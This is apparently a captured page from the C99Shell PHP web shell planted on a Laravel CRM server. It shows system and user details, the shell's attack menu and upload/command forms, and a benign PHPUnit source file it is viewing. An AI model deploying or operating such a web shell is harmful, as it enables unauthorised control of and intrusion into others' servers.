!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/vendor/phpunit/phpunit/src/TextUI/Command/Commands/   drwxrwxrwx
Free 13.14 GB of 57.97 GB (22.67%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     GenerateConfigurationCommand.php (2.78 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php declare(strict_types=1);
/*
 * This file is part of PHPUnit.
 *
 * (c) Sebastian Bergmann <sebastian@phpunit.de>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */
namespace PHPUnit\TextUI\Command;

use const 
PHP_EOL;
use const 
STDIN;
use function 
fgets;
use function 
file_put_contents;
use function 
getcwd;
use function 
sprintf;
use function 
trim;
use 
PHPUnit\Runner\Version;
use 
PHPUnit\TextUI\XmlConfiguration\Generator;

/**
 * @no-named-arguments Parameter names are not covered by the backward compatibility promise for PHPUnit
 *
 * @internal This class is not covered by the backward compatibility promise for PHPUnit
 */
final class GenerateConfigurationCommand implements Command
{
    public function 
execute(): Result
    
{
        print 
'Generating phpunit.xml in ' getcwd() . PHP_EOL PHP_EOL;
        print 
'Bootstrap script (relative to path shown above; default: vendor/autoload.php): ';

        
$bootstrapScript $this->read();

        print 
'Tests directory (relative to path shown above; default: tests): ';

        
$testsDirectory $this->read();

        print 
'Source directory (relative to path shown above; default: src): ';

        
$src $this->read();

        print 
'Cache directory (relative to path shown above; default: .phpunit.cache): ';

        
$cacheDirectory $this->read();

        if (
$bootstrapScript === '') {
            
$bootstrapScript 'vendor/autoload.php';
        }

        if (
$testsDirectory === '') {
            
$testsDirectory 'tests';
        }

        if (
$src === '') {
            
$src 'src';
        }

        if (
$cacheDirectory === '') {
            
$cacheDirectory '.phpunit.cache';
        }

        
$generator = new Generator;

        
$result = @file_put_contents(
            
'phpunit.xml',
            
$generator->generateDefaultConfiguration(
                
Version::series(),
                
$bootstrapScript,
                
$testsDirectory,
                
$src,
                
$cacheDirectory,
            ),
        );

        if (
$result !== false) {
            return 
Result::from(
                
sprintf(
                    
PHP_EOL 'Generated phpunit.xml in %s.' PHP_EOL .
                    
'Make sure to exclude the %s directory from version control.' PHP_EOL,
                    
getcwd(),
                    
$cacheDirectory,
                ),
            );
        }

        
// @codeCoverageIgnoreStart
        
return Result::from(
            
sprintf(
                
PHP_EOL 'Could not write phpunit.xml in %s.' PHP_EOL,
                
getcwd(),
            ),
            
Result::EXCEPTION,
        );
        
// @codeCoverageIgnoreEnd
    
}

    private function 
read(): string
    
{
        return 
trim(fgets(STDIN));
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0062 ]--